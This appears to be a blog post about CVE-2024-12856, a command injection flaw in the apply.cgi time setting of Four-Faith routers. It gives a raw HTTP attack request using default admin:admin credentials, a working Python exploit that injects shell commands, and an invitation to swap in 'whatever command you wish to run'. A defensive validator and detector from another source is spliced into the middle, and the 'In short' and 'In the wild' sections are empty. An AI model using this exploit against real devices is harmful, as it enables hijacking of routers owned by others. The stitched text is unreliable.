The world of network hardware often flies under the radar, but it’s a gold mine for attackers targeting devices left in the wild with old firmware and default credentials. That’s the case with CVE-2024-12856, a critical vulnerability in several models of Four-Faith routers, specifically the F3x24 and F3x36 series. This post lays out—step by step—how this bug works, its real-world impact, and includes working code samples, all in plain English.

What Is CVE-2024-12856?

CVE-2024-12856 is a command injection vulnerability — a bug where an attacker can force a device to run unwanted operating system commands. The flaw exists in versions of the firmware (at least version 2.) used by the Four-Faith F3x24 and F3x36 routers.

Attackers can abuse this flaw via the apply.cgi web endpoint, which is responsible for changing the system time—but, critically, does not properly sanitize input fields. Worse, these routers often ship with default credentials like admin:admin or admin:1234. If these aren’t changed, anyone can break in without authentication.

In short:

How Does the Exploit Work?

When changing the time setting on the router through the control panel, the value is POSTed to /apply.cgi. The device then passes this value straight to a system shell command *without* sanitizing or filtering it. This is classic OS command injection.

Let’s say the router's web admin endpoint is at http://ROUTER-IP/cgi-bin/apply.cgi (192.168.1.1 in the request below):

POST /cgi-bin/apply.cgi HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4=    # "admin:admin" base64
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

action=set_time&datetime=2024-06-01;reboot;

Notice where the critical injection happens:

datetime=2024-06-01;reboot;

This extra ;reboot; after the date terminates the legitimate command and runs reboot on the router. It could be any shell command (cat /etc/passwd, wget …, adduser eviluser, etc.).
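The fix the handler lacks, and the check a defender can run against request logs, as an added example (not code from the original post or from the vendor's firmware): the datetime field is accepted only if it parses as a real date, the system command is built as an argv list with no shell, and a detector flags bodies where the same field carries shell metacharacters. Field names follow the request above; the `date -s` command and the sample bodies are assumptions.

```python
import re
from datetime import datetime
from urllib.parse import unquote_plus

# Characters that let a value escape a shell command string.
SHELL_META = re.compile(r"[;&|`$<>\n\r\\(){}]")


def validate_datetime(value: str) -> bool:
    """Allowlist: accept only YYYY-MM-DD or YYYY-MM-DD HH:MM:SS."""
    for fmt in ("%Y-%m-%d", "%Y-%m-%d %H:%M:%S"):
        try:
            datetime.strptime(value, fmt)
            return True
        except ValueError:
            continue
    return False


def build_date_command(value: str) -> list:
    """Hardened equivalent of the vulnerable handler: validate first, then
    return an argv list (no shell interpretation). 'date -s' is assumed."""
    if not validate_datetime(value):
        raise ValueError("rejected datetime value")
    return ["date", "-s", value]


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body (splits on & only,
    so an injected ';' stays inside the value instead of ending it)."""
    params = {}
    for pair in body.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(val)
    return params


def flag_request(body: str) -> dict:
    """Detection: inspect an apply.cgi POST body for a tampered datetime."""
    params = parse_form(body)
    dt = params.get("datetime", "")
    return {"action": params.get("action", ""), "datetime": dt,
            "valid": validate_datetime(dt),
            "shell_meta": bool(SHELL_META.search(dt))}


# Constructed sample bodies (not captured traffic): benign, injected, URL-encoded
SAMPLE_BODIES = ["action=set_time&datetime=2024-06-01",
                 "action=set_time&datetime=2024-06-01;reboot;",
                 "action=set_time&datetime=2024-06-01%3Btouch%20/tmp/pwned%3B"]


def scan(bodies=SAMPLE_BODIES) -> list:
    return [flag_request(b) for b in bodies]
```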

Python Proof-of-Concept (PoC) Exploit

Here’s a simple Python script that changes the system time and injects a command to create a file (/tmp/pwned) on the router. Replace credentials and IP as needed:

import requests                      # third-party: pip install requests
from base64 import b64encode

ROUTER = "192.168.1.1"               # router IP (change as needed)
USERNAME = "admin"                   # default credentials
PASSWORD = "admin"

# OS command injection payload: a valid date followed by an injected shell command
payload = "2024-06-01;touch /tmp/pwned;"

# Craft the HTTP POST request to the vulnerable endpoint
url = f"http://{ROUTER}/cgi-bin/apply.cgi"
headers = {
    # HTTP Basic auth header, the same as in the raw request shown above
    "Authorization": "Basic " + b64encode(f"{USERNAME}:{PASSWORD}".encode()).decode()
}
data = {
    "action": "set_time",
    "datetime": payload,             # the unsanitized field passed to the shell
}

r = requests.post(url, headers=headers, data=data)
if r.status_code == 200:
    print("[+] Payload delivered!")
else:
    print(f"[-] HTTP {r.status_code} received.")

Replace "touch /tmp/pwned;" with whatever command you wish to run.

From Authenticated to Unauthenticated Exploitation

The web interface is usually protected by a login prompt. But if the router is using default credentials (e.g., admin/admin), an attacker doesn’t need to know anything special—just log in with the usual suspects.

In the wild:

References & Further Reading

- CVE Entry: NVD CVE-2024-12856
- Original Research: IoT Inspector Labs Advisory
- Exploit Reference: Exploit-DB 52433
- Vendor Site: Four-Faith Official

Conclusion

CVE-2024-12856 is a textbook case of what can go wrong when device web interfaces pass user input to the system shell unchecked, made worse by unchanged default passwords. Attackers can take control of vulnerable routers worldwide if left exposed, turning these gateways into botnet drones or worse.

Simple fixes—like changing passwords and updating firmware—go a long way. But unless these steps are taken, attacks leveraging this bug are not just possible, they’re inevitable.

Stay safe, patch up, and never trust user input!

*Exclusively written and condensed for clarity, using only publicly available details and demonstration code. For advanced pentesting, be aware of local laws and only test on hardware you own or have explicit permission to assess.*

Timeline

Published on: 12/27/2024 16:15:23 UTC
Last modified on: 12/27/2024 18:15:23 UTC